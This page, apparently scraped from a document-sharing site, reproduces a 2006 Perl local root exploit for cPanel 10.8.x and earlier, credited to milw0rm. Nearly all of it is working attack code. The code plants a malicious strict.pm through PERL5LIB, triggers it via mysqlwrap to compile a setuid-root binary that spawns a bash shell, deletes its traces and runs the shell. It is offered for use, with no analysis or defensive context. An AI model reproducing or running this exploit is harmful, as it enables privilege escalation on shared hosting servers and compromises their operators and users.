Loading ...
Global Do...
News & Politics
5
0
Try Now
Log In
Pricing
1 #!/usr/bin/perl −w 2 3 # 10/01/06 − cPanel <= 10.8.x cpwrap root exploit via mysqladmin 4 # use strict; # haha oh wait.. 5 6 my $cpwrap = "/usr/local/cpanel/bin/cpwrap"; 7 my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap"; 8 my $pwd = ‘pwd‘; 9 10 chomp $pwd; 11 $ENV{’PERL5LIB’} = "$pwd"; 12 13 if ( ! −x "/usr/bin/gcc" ) { die "gcc: $!\n"; } 14 if ( ! −x "$cpwrap" ) { die "$cpwrap: $!\n"; } 15 if ( ! −x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; } 16 17 open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n"; 18 while(<CPWRAP>) { 19 if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; } 20 } 21 close (CPWRAP); 22 23 open (STRICT, ">strict.pm") or die "Can’t open strict.pm: $!\n"; 24 print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n"; 25 print STRICT "system(\"/bin/echo −n \\\"\$e\\\">Maildir.c\");\n"; 26 print STRICT "system(\"/usr/bin/gcc Maildir.c −o Maildir\");\n"; 27 print STRICT "system(\"/bin/chmod 4755 Maildir\");\n"; 28 print STRICT "system(\"/bin/rm −f Maildir.c strict.pm\");\n"; 29 close (STRICT); 30 31 system("$mysqlwrap DUMPMYSQL 2>/dev/null"); 32 33 if ( −e "Maildir" ) { 34 system("./Maildir"); 35 } 36 else { 37 unlink "strict.pm"; 38 die "Failed\n"; 39 } 40 41 # milw0rm.com [2006−10−01] Page 1/1 cPanel 10.8.x cpwrap via mysqladmin Local Root Exploit Clint Torrez 10/01/2006